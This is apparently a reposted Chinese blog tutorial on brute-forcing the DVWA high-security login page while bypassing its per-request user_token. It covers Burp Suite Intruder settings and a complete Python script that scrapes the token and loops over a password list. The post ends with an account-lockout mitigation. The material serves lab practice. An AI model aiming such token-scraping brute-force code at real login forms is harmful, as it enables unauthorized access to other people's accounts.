記錄一下在爆破的時候繞過token限制的方法
BurpSuite
1.使用burp抓包
bp抓包如下,DVWA高等級暴力破解漏洞靶場進行演示,(注意:這里抓到的包不要點擊forward)

2.配置
發送到intruter模塊,并對需要爆破的目標位置進行設定,(這里主要是為了演示繞過token限制,所以假設已知用戶名為admin),選擇集成炸彈,

方便演示,給password簡單設定個字典

user_token需要從頁面中獲取
步驟:options->add->選中user_token的值,

設定跟隨重定向,方法如下:options->redirection設定always

給token加上payload

結果匹配Welcome字串,

3.爆破
點擊attack開始爆破,報錯,

顯示多執行緒沖突,修改payload1為單執行緒即可;

爆破成功,密碼password,成功繞過,
解決方法:當檢測到頻繁的錯誤登錄后,將賬戶鎖定,爆破也就無法繼續,
Python
#-*-coding:utf-8-*-
import requests
from bs4 import BeautifulSoup
url = "http://127.0.0.1/DVWA/vulnerabilities/brute/index.php?username={0}&password={1}&Login=Login&user_token={2}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0'
}
cookies = {
'security':'high',
'PHPSESSID':'a5ta238sbggu66lnigk48074c0'
}
payloads = [
'123456',
'whoami',
'password',
'langren',
'lianxiang',
'pwdls',
'admin'
]
def burp(payloads,url):
#獲得user_token
source = 'http://127.0.0.1/DVWA/vulnerabilities/brute/index.php'
web_data = requests.get(source, headers=headers, cookies=cookies)
soup = BeautifulSoup(web_data.text, 'html.parser')
user_token = soup.select('input[name="user_token"]')[0]['value']
# 爆破
for payload1 in payloads:
for payload2 in payloads:
target = url.format(payload1, payload2, user_token)
print u'當前請求:' + target
web_data = requests.get(target, headers=headers, cookies=cookies)
soup = BeautifulSoup(web_data.text, 'html.parser')
user_token = soup.select('input[name="user_token"]')[0]['value']
feature = soup.find('pre')
try:
if feature.get_text() == 'Username and/or password incorrect.': # 錯誤的密碼或者用戶名就會頁面會出現此陳述句,這也是我們需要檢索的
print u'錯誤'
except:
print u'可能得到結果:'
print 'username:' + payload1 + '\n' + 'password:' + payload2
exit(u'結束')
if __name__ == '__main__':
burp(payloads,url)
爆破成功

參考文章:https://www.cnblogs.com/qi-yuan/p/12395524.html
僅供學習使用!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297077.html
標籤:其他
上一篇:執行緒的死鎖
下一篇:華為ACL
